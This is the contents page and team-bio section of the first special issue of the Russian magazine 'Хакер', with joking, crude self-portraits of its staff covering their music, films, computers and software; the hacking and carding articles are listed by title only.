Спецвыпуск хакер, Содержание номера # 001

ЖУРНАЛ ХАКЕР
Cover 001 |
Статья | Стр.
Команда |
Команда Хакера | 004
PC Zone |
Y2K: must die или нет? | 014
Х-броузер. Альтернатива пришла! | 017
Практические советы начинающему биохакеру | 018
Хакеры: кто они есть? | 021
Пусть на WWW чатятся ламеры! | 024
Как поиметь девочку из чата? | 026
X-Files & X-Net | 030
DJ Groove | 034
Cам себе Грув | 038
X-почту доставляют только Вампиры! | 040
Х-дизайн | 042
Как кидают лохов при покупке компьютеров | 044
Теперь ты будешь апгрейдиться нахаляву | 047
Взлом |
100% скидка на получение кредитной карты | 050
Немного о хотмейловском мыле | 052
Узнай кто еще звонит твоей подружке | 053
Хакнутая подземка | 054
Как обидеть/защитить тетю Асю | 056
Большому кораблю - большая торпеда | 058
Неизвестность - мой адрес, Анонимность - мое имя | 061
Береги password смолоду! | 062
Что такое кардинг? И сколько за него дают? | 064
Лучшие программы для Хакера | 066
Вирусы | 068
Опасная игра со смертью | 071
NetBus - троянец-игрушкка! | 074
Бедность не порок, а способ шевелить мозгами... | 077
Хакерская группа KpZ - изнутри | 078
Кевин Митник: недетские игры | 082
Вся технология Warez'а | 085
Халявная Электронная Почта | 086
Исповедь пирата | 088
Малыш и Карлсон на варезной крыше | 090
Эксклюзивное интервью пирата для Х | 092
Почему закрылась группа UCLabs | 094
Ты должен знать, как тебя хаккают! | 096
Больше Warez'а! | 097
Западло |
Как стать рабовладельцем в сети | 098
Раскрути свою страничку в стиле Х | 100
От Советского ИнформБюро | 102
Убийство Netscape'а и Internet Explorer'а! | 104
Искусство художественного прикалывания | 106
Как нагадить соседу, заглушить чемпионат по футболу | 109
Юниты |
WWW | 110
FAQ | 118
ё-mail | 126
Хумор | 132
Шаровары | 138


Спецвыпуск хакер, номер #001, стр. 001-004-1, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-1

Сергей Покровский aka SINtez aka CКОРОСТЬ aka Pornholio

Ну что рассказывать? Да вроде нормальный парень, пью, курю, с девочками в постели кувыркаюсь. С компом познакомился, когда началась повальная мания на ZX Spectrum. Поехал на Тушинский радиорынок, закупился, собрал. Крутая была тачка! Со 128 Кб мозгов! В отличие от обыкновенных 64К, моя могла воспроизводить стереозвук! :). Потом мне исполнилось 14 лет, и я пошел во Второй Всероссийский Вычислительный Центр (благо он недалеко от дома моего), и понеслось... БК, Robotron, Apple, EC1440, IBM XT, IBM AT 386 и так далее... Языки тоже пошли один за другим: Basic, Pascal, ASM. Были еще всякие Прологи и прочие отмершие наречия, но все это прошло так быстро, что даже в мозгу не осталось. Потом учеба в институте началась, на какое-то время я комп забросил, начал активно клубиться (тогда как раз Тимур Новиков привез в Россию Рейв - первая Гагарин-Пати). Потом прошло время, клубная культура мне надоела, в клубах стало скучно, ничего нового не происходит, промоутеры обленились, тематические вечеринки никто по нормальному не делал, вообще угар пропал. Вот так в моей жизни опять появился комп. Купил, побаловался, поиграл (тогда, кстати, я только и делал, что геймился), и тут по башке как шандарахнет! Интернет. В 93-м подключился, и мне окончательно сорвало башню. Такого наркотика я еще никогда не видел. Полгода я почти не выходил из дома. Забросил почти все. Друзья не могли ко мне дозвониться, так как линия была занята 24 часа в сутки (я сидел на анлимитеде и не выходил из Инета никогда). Бродил по сайтам, качал софт, очень много читал документации и статей на разных страничках, а в перерывах писал для разных журналов статьи об Инете. Потом приятель предложил заняться новым проектом - журналом СК (Семейный Компьютер). Собралась команда молодых тусовочных ребят, и мы начали все подготавливать. Мы задумывали его как киберпанковский журнал и таким и начали делать, но, к сожалению, начальство издательства было не настолько прогрессивно, и уже на 3-м номере нас закрыли. Было очень обидно, потому как именно тогда журнал начал раскручиваться, и нас начали читать. Потом был «Компьютер и Жизнь», в котором многие из СК-шной команды перебивались кое-как, писали, редактировали. Я начал делать там рубрику о хакерстве и только я ее сделал, и мы начали ее верстать - разразился кризис августа 98-го. Журнал умер.

Потом пришла идея создать журнал, в котором не было бы всего этого дерьма типа «сейчас я расскажу тебе о веб-камерах». Кому они на хрен нужны, эти веб-камеры - говорил я. Ну вы прикиньте, мужики, какая в задницу веб-камера? Ну и в чем здесь фишка-то? Ну увидел я, какой он Рио-де-Жанейро именно сейчас, именно в эту минуту, ну и что? Что у меня от этого член должен встать, что ли? Нет, ну я еще понимаю, когда ставят какую-нибудь шпионскую камеру (не обязательно в унитазе), вот это прикольно. Прикольно подсмотреть за человеком, когда он об этом даже не подозревает, но вот какого хрена пялиться на все эти города? Короче, задумка была проста: делаем журнал, в котором рассказываем людям только то, что им нужно, без всего этого «ну, блин, есть 2 полосы пустые, надо что-нибудь написать...» и всем по барабану что именно. Но это только первая фишка. Второй фишкой было то, что народу уже до гландов опостылело читать все эти выпендрежи, когда автор прям из штанов выпрыгивает, лишь бы показать, какой он умный и как он сейчас этого тупого читателя научит уму-разуму. Ну перед кем они выпендриваются? В общем, долго мы об этом трепались и все говорили об одном - читать нечего, все журналы, которые вначале были неплохими, теперь тоже превратились в полный отстой, и надо что-то делать. А что делать? Нет, ну можно, конечно, писать им письма, мол, «Ах вы суки, твари безмозглые, ни хрена вы делать не умеете, засуньте свои статьи себе в задницу и два раза там проверните. С уважением, Сергей». Только зачем? Людей обидишь, а ничего нового не появится. Поэтому выход один: создать свой журнал, где и делать все так, как мы хотим. Вот так и появился «Хакер». Итог ты видишь и читаешь каждый месяц. Такие дела :).


Спецвыпуск хакер, номер #001, стр. 001-004-2, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-2

Ненавижу: будильники

Люблю: девушку свою, кино, компьютер (хотя часто мне кажется, что я его уже терпеть не могу :)).

Музыка: музыку люблю электронную, в основном старых электронщиков типа Orbital, Fluke, The Future Sounds of London, Photek, Apex Twin. За последние года 3 подсел на Drum’n’Bass и Electric Dub, ну и AcidJazz - это святое, это всегда была любимая музыка (как ее можно не любить?).

Кино: некоммерческое кино (типа «Ненависть») и психологические триллеры. Люблю, когда после завершающих титров в мозгах начинают возникать всякие мысли, теории, догадки. Примеры? «Матрица» (ну ест-но!), «Нирвана» (мой любимый фильм. Наиболее точно и красиво передан дух киберпанка), «Адвокат Дъявола», «Обычные подозреваемые», «Игра», «Trainspotting», ну и так далее, я думаю, ты уже врубился.

Компьютер: Интернет - рулит. Хотя заглядываю и в Фидо, но мне кажется, что эта сетка уже мертва. Оффлайн - это старо. Последнее время не могу побороть в себе вредную привычку скачивать mp3-шки :).

Софт: Ось - Win95, Linux RedHat, Браузер - NeoPlanet для Win и Netscape Navigator для Linux, Мейлер - The Bat, IRC - Pirch98 для Win и Ircii для Linux, Качалка - GetRight, Звонилка - обычный удаленный доступ, самая рабочая программа - M$ Word.

Отдых: если в Москве, то лучше всего посидеть в каком-нибудь баре, попить пивка, водочки, например, в Пропаганде. А вообще, прикольно ездить с Холодом и девчонками куда-нибудь за город или завалиться в какое-нибудь местечко, где можно поиграть в бильярд. Но больше всего я люблю спать :), ну или не совсем спать :).

Имя: Александр «Холод» Черных

Полное имя: Холодильник (вариации: Холод, Голод, Голодильник, Холодец, Холодизма, Калодильник)

Ненавижу: музыку на трех блатных аккордах, алкоголь (и, как следствие, пьяных людей), сигареты (и когда кто-нибудь курит. Хотя когда Серега курит - терплю :)), бабушек, шум, толпы людей, разговоры о деньгах и шмотках, плохой коннект.

Люблю: свою семью, свою девушку, одиночество, спокойствие, тишину и темноту. А еще - свою машину, «Бешеную Антидевственницу» - WV Jetta C 1,3 HK 84г.в. Как следствие, люблю на ней ехать с любимой девушкой куда-нибудь в тихое, темное и спокойное место, где чуть-чуть одиноко.


Спецвыпуск хакер, номер #001, стр. 001-004-3, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-3

Музыка, которую я слушаю: Орбитал, Голди, Эня, Фотек, ФоХиро, Пропеллерхэдз, Дип Форест, саундтреки к MWII.

Кино, которое я смотрю: я, на самом-то деле, кино дико ненавижу и почти не смотрю. Последний фильм, от просмотра которого получил удовольствие - «Матрица», при этом удовольствие получено преимущественно оттого, что на сеанс ходил с девушкой. До «Матрицы» последний раз с удовольствием смотрел фильм «Полет Нарушителя» про Вьетнамскую войну, лет пять назад. Телевизор не смотрю, все бесит. Даже MTV.

Компьютер: Celeron 333a, mb ASUSTEK P2B, RAM 32mb, case SOLIST atx, video S3Virge GX2 AGP 4mb, HDD Quantum 3,2 SE, CD-REC Mitsumi IDE 4x8, sound - AWT3820 + 8mb RAM + TB RIO synth + midi controller CASIO GZ-5 + joystick Saitek x35t + Saitek X36f programmable. Делаю с ним все, только в губы не целую.

Софт: все самое типичное: обычные 95-е, обычный офис, обычныe IE4, Outlook Express. Шелл - Connect! The IBM Handshaker 7.0. Правда, еще я балуюсь музыкальным софтом: Cakewalk 7, Bbox 1.1, Rebirth 2.0, AWEToy 2.0, VAZ! beta, Analogic 1.0, Retro-AS, HammerHead Rhytm Station, COOLPRO, Sonique 0.60, GoldWave. Пытаемся с напарником писать, типа, музыку, но соло не будет, потому что ничего не получается.

Отдых: больше всего люблю отдыхать в обществе любимой девушки или в одиночестве, избегаю шумных компаний, люблю уютные кафешки с молотым кофе где-нибудь в глуши. Правда, чаще приходится отдыхать активно - за рулем, охотясь на бабушек и их клюшки. Но это тоже неплохо.

Р.Рубанский ака Matrix

Ненавижу: Алкоголь, героин, реланиум, димедрол, первитин, русскую музыкальную

индустрию, скучный секс, венерические болезни.

Люблю: Millenium, электронные импланты, крэк и техно-саунд трек.

Музыка: Альтернатива: Skinny puppy, Front line assembly, Haujobb, Front242,

Converter, Decree, Ms Gentur, Tunnel, Noisex, Die Form и тд.

Кино: THX1138, Tron, Alien, Hellriser, Bladeruner, Ghost in is shell,

Star wars, Matrix, Necromantik, Ironman и т.д.

Компьютер: Pentium3-350

Софт: Windows98, IE4, 3D MAX, AdobePhotosop, Adobeillustrator, Freehand

Отдых: Групповой секс в бассейне, путешествие по экзотическим странам, путешествие в параллельные миры.

Терехов Михаил aka Stranger

Привет, народ! Сейчас мне 19 лет и учусь я на 3 курсе физмата МГОПУ, через пару лет пойду ПрепоДДавать детям в школе математику и информатику (бедные детишки...). В свободное время пинаю плюшки по полу, пишу в Х и приятно провожу время в компании друзей или девушки, а может быть целой компании девушек. Перерывы между всем написанным выше я провожу за компьютером в Интернете. По моему мнению Инет это как косячки, с каждым следующим хочется все больше и больше (в смысле косячков, а не косячки побольше), умом понимаешь: надо бросать, но... уже не дано! Попал в журнал совсем случайно (почти кирпич на голову, когда каску снял)... Если бы не купил второго номера ради тестового прочтения, то до сих пор так и просиживал бы свои штаны дома без интересного для меня занятия. Теперь штаны в порядке, а вот клава у компа изнашивается все более.


Спецвыпуск хакер, номер #001, стр. 001-004-4, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-4

Люблю слушать музыку и много... Предпочтение отдаю русскому року, но вообще-то я всеяден и очень многое слушаю по настроению. Являюсь настоящим фаном группы «Парк Горького» и могу слушать ее везде и всегда. Много свободного времени провожу в походах по кинотеатрам (рюкзак и палатка - вечные спутники :)))). Особых пристрастий в кино нет, но все-таки люблю смотреть качественные и интересные фильмы. На компьютере я обычно пишу статьи, рефераты и т.д. и т.п., а также программирую. Работаю пока еще под ВИНГЛЮКОМ 98, руки никак не дойдут поставить себе Linux. Обозреваю Инет я обычно Оперой, но иногда запускаю и Neoplanet, дозваниваюсь я с помощью Etype dialer’а, а скачиваю - Go!Zill’ой. Моей почтой заведует TheBat. Проводнику форточек предпочитаю Far. Самая моя юзаемая прога Adobe ФОТОЖОП (статьи все же в Ворде пишутся, потому что их jpg и psd версии Серега Покровский отказался брать, говорит - читать неудобно :))))).

Отдыхаю я очень бодро и спортивно: хожу в тренажерный зал, играю в баскетбол, бадминтон и футбол. Бывает это не часто (раза 4 в неделю), дел-то много, и в это светлое время задвигается почти все. Правда, к Инету даже в это время влечет, заведу себе ноутбук с сотовым телефоном, и держись эфир да провайдер.

Макс Зелененко aka Maxx

Привет, мне 19 лет и сейчас я учусь на втором курсе юрфака. Кроме учебы я работаю компьютерщиком в фирме, ну и, конечно же, пишу в Х. Полтора года назад я впервые попал в Инет и остался там, похоже, насовсем. Сеть стала для меня новым миром, где все время надо быть на гребне волны и многому учиться, все в ней течет и изменяется, заставляя тебя изменяться, причем делать это очень быстро. Вообще, Инет и компьютеры, по моему мнению, это все же форма наркомании, ежели ты один раз с ними связался, то это уже навсегда, и лечиться надо только хирургическим вмешательством (ампутация головного мозга :)))).

В жизни я ненавижу напыщенных, самоуверенных людей (многие из тех, кто ничего не умеет, но считает себя кул хацкерами - как раз такие). Люблю хороших людей, веселые компании, естессно, Инет и компы, а также все, что к ним прилагается (обожаю день зарплаты :)). Музыку слушаю очень разную, но есть любимая группа - «Парк Горького». В кино смотрю все, главное чтобы было хорошо снято, лучшим фильмом считаю «Криминальное чтиво». Комп для меня - это средство связи с окружающим миром, средство чему-либо научится, это то, что облегчает мне жизнь.

О содержимом компа... Живу я под 98 форточками, так как пишу о прогах именно для них, броузер на сегодняшний день юзаю Эксплорер, правда, облагороженный Neoplanet. Мылер у меня, естественно, самый кульный из имеющихся, а значит The Bat. По принципу от добра добра не ищут уже очень давно юзаю IRC клиент Pirch98s и им доволен. Любимая качалка - новый Getright, а звоню и дозваниваюсь я при помощи Edialer и Advanced Dialer, они служат у меня для разных целей. Использую два стильных альтернативных десктопчика NextStart и Talisman (выбор определяется настроением). Как и у каждого, есть ICQ, Winzip. Защита - AT-Guard. По роду занятий чаще всего юзаю все проги, связанные с Инетом и Word.


Спецвыпуск хакер, номер #001, стр. 001-004-5, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-5

Отдыхать люблю активно: хожу в тренажерный зал, играю в баскетбол. Люблю собраться с друзьями в хорошей компании.

delta

В данный момент учусь в МТУСИ ( Московский Технический Университет Связи и Информатики) на первом курсе (кстати, Курт тоже, кажется, там учился, но его выгнали 8=))). Все свободное время провожу за компом и за чтением технической литературы. Часто по пятницам бываю в клубе Нирвана, люблю по сети поиграть в Half-Life Action. Кстати, ник delta я взял себе после того как купил мопед с тем же названием и очень долго с ним возился =). День чинишь, день катаешься.

Ненавижу: Монополистов, коммунистов, ублюдоков.

Люблю: отдыхать.

Музыка: DDT, Гарик Сукачев, Танцы Минус, Текила Джаз, Radio Head, Nirvana, etc...

Кино: Окно в Париж, Nirvana, старое советское кино.

Компьютер: Сижу в Инете, познаю бескрайние просторы Unix, программирую на C++, perl. Играю в Midlle Town Madness/Half-Life/delta force.

Софт: На первом компе Linux и Win98, на втором - OpenBSD. Irc-клиент: mirc,ircII + phoenix script, браузер: IE/Lynx. Качалка: Reget/wget. Звонилок нету. Самая юзаемая программа: текстовой редактор в Win (это Write), а в Unix: pico или joe.

Отдых: Бакланю :)

Как мы пишем статьи с MAL’om? Это самое смешное. Как всегда, все откладывается до последнего срока, но и к этому сроку MAL куда-то пропадает, а на следующий день появляется и рассказывает, как на какой-то квартире была страшная оргия или в метро он кого-то избил, а еще бывает его побьют или в милицию заберут =). Одно время я приезжал к нему в гости или он ко мне, и писали вместе. Вроде нечего получалось. А теперь я что-то пишу и отсылаю ему, а он дописывает, и наоборот :). Самое прикольное это комп MAL’a ;)). Корпуса там нет. Материнская плата просто лежит на полу, монитору 7 лет =)), мать обгорелая ваще. :)

Экстремальные условия, короче. Я вообще не знаю, как MAL что-то вообще делает! Может кто-то из читателей поможет ему? =)))))))))

MAL

Ну, типа, я MAL. Для тех, кто не въехал, это слово переводится с инглиша как плохой, жестокий, а для тех, кто не учил иняз., объясняю, что читается MAL по-русски как МЭЛ.

Учусь в институте (иногда), увлекаюсь всем, чем нельзя, живу в Москве. Особое место в моей реальной жизни занимает разрушение, причем неважно чего (кого), где и когда. В журнале я делаю раздел «Юниксоид». Unix - ось, можно сказать, в некотором смысле стабильная, но в то же время требует частого обновления, так и можно сказать обо мне в целом. Мне всегда требуется что-то новое, то бишь иногда, придя из института, меня может взбесить мысль о том, что все люди как тупые машины, каждый день ходят на работу, обратно, ложатся спать и опять прут по тому же кругу. Ощущение создается такое, что нужно перекомпилить новое ядро :)), после чего я исчезаю из дома в поисках новой версии времяпроядрения.


Спецвыпуск хакер, номер #001, стр. 001-004-6, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-6

Ненавижу: меня бесит однообразность, ненавижу, когда что-то не получается, меня раздражает мой компьютер.

Люблю: то, что я люблю больше вс

его, писать не буду :), скажу лишь, что мне нравится получать удовольствие, люблю днем завалиться на кровать или кресло и слушать музыку, а вечером тусоваться в веселой компании.

Музыка: больше всего нравится рок, панк-рок, а вообще послушать могу все, кроме попсы и рэпа. «Нирвана» помогает жить :).

Кино: Тарантиновские фильмы и им подобные смотрю с удовольствием, также нравятся старые фильмы про хиппи.

Компьютер: на компе я ни хрена не делаю последнее время, потому что он меня бесит ужасно, причем, я его уже столько раз бил, пинал, поджигал, обливал, а он, гад такой, не ломается. У меня вообще 5x86 супер-тормозная машина, на которой стоит тупой Windows98, Zipslack4.0 и RedHat5.2 (чиста для прикола) :).

Софт: Какие операционки у меня, я уже сказал, сижу в основном из-под слаквары, не врубая тупой X-windows, а из консоли, поэтому мой любимый браузер - lynx :), мэйлер - mutt (кстати, просто супер-прога, лучше не видел в жизни), IRC-клиент - BitchX, Звонилка - скриптами, ё-маё :), самая юзаемая прога - telnet.

Отдых: бары, клубы, дискотеки, самые посещаемые - Нирвана, Текила Бум, Мастер, МДМ, Дом туриста (бильярд там офигенный).

Ростислав Щорс aka RosT

Я люблю жизнь, а в ней девушек (как и все нормальные особи мужского пола), компы и все связанное с ними. Дома у меня стоит 3-й пенек 450 частоты со 128 Мб мозгов на борту и всякой необходимой для работы комплектухой. На этом чуде установлен 98-ой Мастдай (Не подумай, что я от него без ума, просто под него написано больше всего программ.). В плане компьютера я занимаюсь всем по чуть-чуть, но в основном графикой. Торчу от Инета, не спутай с минетом, хотя от него я тоже торчу. В Инете качаю музыку и программки, общаюсь с людями, гамлюсь и попросту читаю всякую интересную инфу. Для влезания в Инет у меня установлен стандартный набор программ. Это - мастдайский Explorer, Outlook, Getright и, конечно, Icq (53776792). C давних пор сижу в Fido и подобных сетях, например, Hackers Net.

Что касается игр, то я почти в них не играю, за редким исключением. Моя любимая игра Brood War. Играю в нее дома, а также достаточно часто на московском Battle Net’e.

Из музыки слушаю всего по чуть-чуть, но в основном клубную, такую как drum’n’bass, breakbeat, jungle. Ненавижу совковую попсу, да и вообще совковость во всех направлениях жизни.

Из кино предпочитаю триллеры, особенно: «Игра», «Идеальное убийство». Любимый актер - Майкл Дуглас. Из-за привязанности к фильмам регулярно посещаю всякие кодеки, пушкинские.

Отдыхаю в кругу друзей, пива и девушек. Каждый раз по-разному, чаще на всяких домашних сейшенах.

В общем, везде успел отметиться! Жизнью доволен! Классно! Весело! Прикольно! Отрываюсь, как могу!

Доктор Добрянский aka Доктор Прозвонкин aka Dr. Cod.

Еще раз про Dr. Cod. Cod переводится как треска. Ребята, вы меня уже запарили, я знаю про это. Дело в том, что изначально это звучало как Кодировщик, а потом только как Др. Код и уже совсем потом появился английский ник: Dr. Cod. Понимаешь, здесь должно быть ТРИ буквы, а не четыре, как в Code!


Спецвыпуск хакер, номер #001, стр. 001-004-7, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-7

И если ты думаешь, что я Код, потому что чего-то кодировал, ты прав. Только кодировал я не компы, а людей. Так меня прозвали друзья за увлечение практической психиатрией. Хакинг разный бывает. Можно тырить пароли с винта, а можно из мозгов.

Я давно занимаюсь телефонией, радиоэлектроникой, программированием, собираю и разбираю компы. Особенно интересны жучки и прочая радиовредительская аппаратура. Я считаю, что чем прибор проще, тем он надежней. А готовые схемы, что печатают в разных книжках - полная лажа.

Ненавижу: когда отключают горячую воду в доме

Люблю: девушек, лето, осциллографы.

Музыка: Джаз и только живьем.

Кино: С появлением компа стали часто и плохо использоваться компьютерные эффекты и текстуры. Меня от этого тошнит. Обидно, ведь имея такие технические средства можно было бы сделать фильм в 1000 раз лучше. Zbig Ribchynsky этому хороший пример. Еще очень интересно смотреть старые черно-белые фильмы.

Компьютер: Пишу матерные письма друзьям и статьи в Х.

Софт: Только не это! Пожалуйста, можно на это не отвечать? Маленький винт - больное место.

Отдых: Отдых и развлечения для меня отличаются. Отдых - полное расслабление где-нибудь на природе, когда никто и ничто не давит мне на нервы. Никакого шума, музыки, разговоров, игр.

Развлечения: Клубы типа ДОМа, JAC’a. Прогулки с друзьями по Москве. Заезд в редакцию Х (вот это крутое развлечение!). Пиротехника, особенно если кому-нибудь что-нибудь оторвет. Какое-нибудь электронное вредительство.... Все не перечислить, места не хватит.

Юрий Антонов aka A.D.I.D.A.S.

Вообще-то, адидас это мой второй ник... Адидас это UneartheD на пенсии :). Просто UneartheD трудно выговариваемый и грузовой немного. Но им я все равно пользуюсь. А вся фишка ника A.D.I.D.A.S. - это его расшифровка :)) - «All Day I Dream Аbout Sex».

Назвался я так из-за впечатлившей меня одноименной песни KoЯn’а. Я под впечатлением сделал себе ящик adidas@ru.ru , а так как ящик этот у меня самых ходовой, я от адидаса не отвязался... теперь вот так и обитаю! :))

Про компы если... На моем пути у меня было 4 компа (ZX Spectrum 64k, 286ой, P 150 и нынешний P2 333). Скажем так: спектрум пробудил во мне чувства к компам, 286-ой был подопытным кроликом, 150-ый пень стал связным звеном между дряхлой системой 280-ого и новыми технологиями, ну а 2-ой пенек 333 дал мне возможность воплощать все, чего понабрался переходя от компа к компу. :))

Учусь я в экстернате (перто жуть как). Часто в сокс играем с народом. Мечта - Snowboard K2 или Burton. :)) Да подороже (поэтому и мечта :)). В одежде ненавижу условности - т.е. там «Юрочка, надень галстучек, а то на экзамене тебе надо выглядеть прилично» - КАК ХОЧУ, ТАК И ВЫГЛЯЖУ. Да, тока не надо думать, что раз у меня ника адидас =>, я весь в спортивном костюме!!! У меня ни одной вещи нет адидасовской. И мне за «рекламу» не платят! (хотя МОГЛИ бы :))


Спецвыпуск хакер, номер #001, стр. 001-004-8, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-8

Люблю неформальные виды спорта - всевозможные *board. И вообще такие занятия и развлечения, при которых содержания КРОВИ в АДРЕНАЛИНЕ не превышает 1%!!!!! :))

Музыка: Альтернатива - !KoЯn! , !LiMP BiZKiT!, The Deftones, Snot, Pitchshifter, ZDOB si ZDUB, Кирпичи. C:\rm ПОПСА trash

(ПОПСА = BSB, FIVE, TET-A-TET, Aлсу и все из данной группы недоразвитых пресмыкающихся).

Кино: From Dusck Till Dawn, Trainspotting, Lock Stock & Two Smoking Barrels, !PULP FICTION!, Rent Lola. Да и вообще Тарантино всех сделает :)). И фильм, который произвел на меня сильнейшее впечатление - In The Mouth Of Madness - так мозги раком ставит!!!

Софт: Винды 98 (кода ж они накроются), NT. IE4 - просто ломает меня менять его на что-нибудь другое, The Bat!, Mirc 5.02, Go!Zila - но GetRight лучше, звоню я потным E-Dialer’ом. А самой юзаемой прогой считаю X-scanner07 (прога - лажа, но ее популярности на моем компе есть одна ОЧЕНЬ приятная причина!).

Отдых: Отдыхаю я туся с друзьями :)).

Шурик aka Колбасьев Captain

Жил я всегда в дивном волжском городке (а ты по наитию думал, что это Крым на фотографии?), про который народ сочинил две песни - одну хорошую, а другую пролетарскую, но это неважно. В Москве был два раза и оба никак не удавалось посмотреть на живого Ленина в пирамиде, зато в зоопарке увидел много не менее живых обезьян и пьяного дворника, так что этим веселым дуэтом мне и запомнилась наша чудная столица.

Когда последний раз поехал в деревню, то, от нечего делать, хакнул там всех окрестных бабушек, кривого барана, каленый амбарный замок и сочинил энциклопедию песочного крекера, по тому ассортименту, что был в местном сельпо, и в тот самый миг понял, что когда выросту, буду хакером. Вот с тех самых пор и...

Ненавижу: дисконнекты, прохладительный напиток «Кука-кола», пиво «Адмиралтейское», «Беломор».

Люблю: отсутствие дисконнектов, прохладительный напиток «Квас», пиво «Сталинградское», сигареты «Друг».

Музыка: ммм... ну, ранних Битлов люблю, Led Zeppelin, Louie Armstrong, Лаписа Никифоровича Трубецкого (душевно поют, мерзавцы!).

Кино: конечно «17 мгновений весны» и «Ко мне, Мухтар». Из западного «кина про хакеров» только новенькая «Матрица» понравилась.

Компьютер: Что я делаю на компе? Живу я на нем, черт возьми. А еще со всякими непонятными программками вожусь, народные трагедии в «Ворде» сочиняю и в разные кваки-шмаки режусь...

Софт: Ха-ха, не ждите откровений! У меня ентих осей на винте тьма непролазная стоит, а Вироуз-95 аж с декабря 94-го... И браузер тот же, сколько бы я «Оперу» не любил, все равно катаюсь по волнам на Ишаке 5.0. А вот мыло только Бетмену, только ему и доверить, как и все остальное. Никогда не устану вещать, что лучшие прикладнушки - у кого-нибудь помельче. Гетрайты там всякие, E-Dialer’ы, Штирлицы, Вояджеры, ну и тэ дэ. :)

Отдых: Кто, я спрашиваю, сказал, что лучший отдых активный? Лучший отдых - прилечь вечерком на четвероного друга (диван) с хорошей книжкой (под подушкой); посмотреть развлекательную передачу по TV («дежурная часть», «прогноз погоды») и под мерное трескание (камина? шиш! - китайского кулера!) подтянуть поближе кейборд и начинать все сначала...


Спецвыпуск хакер, номер #001, стр. 001-004-9, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-9

Димка КурзенкOFF aka KurT

Мне 20 годиков. Живу в Москве, малый Арноутовский переулок, подвал №13. Стучать 3 раза. Не учусь, не работаю. За не внесенную квартплату выселили на улицу, кое-как смог поселиться в подвале, в котором сейчас и живу. Питаюсь исключительно тараканами. Кто не пробовал - очень советую.

22 часа в сутки провожу за компом. И это нормально! Может, кто-то подумает, что я маньяк-мазохист? Ни фига подобного. Так как считаю, что если бы не компьютер, то валялся бы я сейчас где-нибудь на помойке и трясся бы в ломке. Согласен с утверждением, что компьютер это в какой-то степени наркотик. Но это гораздо более приятный наркотик, чем всякие там LSD, экстати, герычи и т.д. Разница в том, что от наркоты в прямом смысле сохнут мозги, а от компа наоборот, происходит постоянная генерация интеллекта! Как говорится, Generation Next! :)

На компьютере в основном занимаюсь Графикой в области: полиграфии, Наружной рекламы, WEB дизайна, Верстки и т.д. Увлекаюсь программированием.

Про Интернет я вообще молчу :-). Первым моим провайдером был com2com. И я даже тогда заплатил за Интернет :-\\\. Вспомнить страшно :).

Первым моим компом был БК-0010 + Пленочный магнитофон ЭЛЕКТРОНИКА 62М. Крутая была тачка. Аж 32 кб памяти! Что я на нем делал? Страдал написанием на (чуть не сказал VB :-) Basic’e всякой пурги :-). Ну ладна, чета я совсем того. Думаю, хватит! :)

Ненавижу: КОММУНИЗМ, МОЛОКО, RAP (особенно наш), ДУРАКОВ, MAC OS.

Люблю: ЖАРЕНЫЙ СЫРРР, MS-DOS, FDISK.EXE, PHOTOSHOP, TPC/IP, Соca-Cола.

Музыка: NirvanA, Sepultura, Rollins Band, OffSpring, AC/DC, Metallica, KORN, Macbeth.

Кино: Комедии (Джим Кэри), Ужастики. Из русского: 12 Стульев.

Компьютер: Графика, Дизайн, Программирование, Игры 3D Actions (Quake1,2,3), Фигнейстрадание, Заклевывание клавы до смерти, борьба с домашним LAN’ом (зверь такой), Вечный UpGrade системы и т.д.

Софт: OS: МАЗДАЙ 98, Windows NT 4, Linix, Browser: Internet Explorer 5.0, Netscape Nafigator 4.7, IRC: none, Качалка: Go!Zilla, Звонилка: Удаленный доступ, Программирование: Delphi 5, WinSight32, Turbo Pascal, Самая юзверная прога: Драфвер мышы :-)! Шутка. PhotoShop 5, Графика: Corel Draw 9, PhotoShop 5, 3D Studio Max 3, Bryce 4, MacroMedia Free Hand 8, Adobe Illustartor 8 и т.д.

Корноухов Иван ака SideX

Был рожден в роддоме нумер 13, на Шарикоподшипниковской улице, много лет назад. Понял, что надо писать для средств массовой информации, будучи в младенческом возрасте, разрисовывая обои дрякозяблами, схожими с кодировкой Кои-8. А тягу и потенцию к хакингу получил во время взлома фотоаппарата «Ломо», в том же детском возрасте. Но разборки (сборки) с фотоаппаратами быстро надоели, и требовалось нечто более глобальное. Тогда я познакомился с компутером. То чудо, было страшным ноунеймом, но научило меня быть паратрупером, а чуть позже и диггером. Потом было много чего еще, но самый угар начался, когда у меня появился момед. И все бибизяки были замучены скачиванием сим момедом-2400. И это еще ничего: все поняли, что настал абзац, когда я настроил собственную бибиэску... Но наступил черед тотальной информатизации, и я проник в Инет, где и сейчас бомжую. Поняв сущность сей среды, я стал почти антисоциален, доказывая ее несовершенство путем различных заподлянок и хулиганств. Но, попав в лечебно-трудовой профилакторий под названием «Х», окультурился, и эти плоды культуры выпадают в ежемесячные публикации.


Спецвыпуск хакер, номер #001, стр. 001-004-10, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-10

Так вот, многие наши хацкеры считают себя настолько крутыми и независимыми, что пробивают в массы идею о том, что были, однозначно, найдены в капусте. И своим существованием никому не обязаны. Я же, очевидно, буду более оригинален, вспомнив о своих родителях, что взрастили меня. Благодаря родителям я начал писать, творить, созидать (в результате чего наши читатели хакают, ломают и уничтожают :)).

Ненавижу: сотовый телефон Philips AEON, людей, которые говорят вслух транслитом ;), и тех, что в разговорах голосом - включают Капс Лок ;).

Люблю: процессор Цэлерон, зеленый горошек и качественных девушек.

Музыка: В славные годы прыщавой подростковости увлекся отечественным и английским панк-роком. Но строение информационного общества обязывало к мутации в сторону электронной, некоммерческой музыки. Чему я подвергся, дабы зашифроваться под образ некого Cyberpunk. Киберпункера по-нашему :).

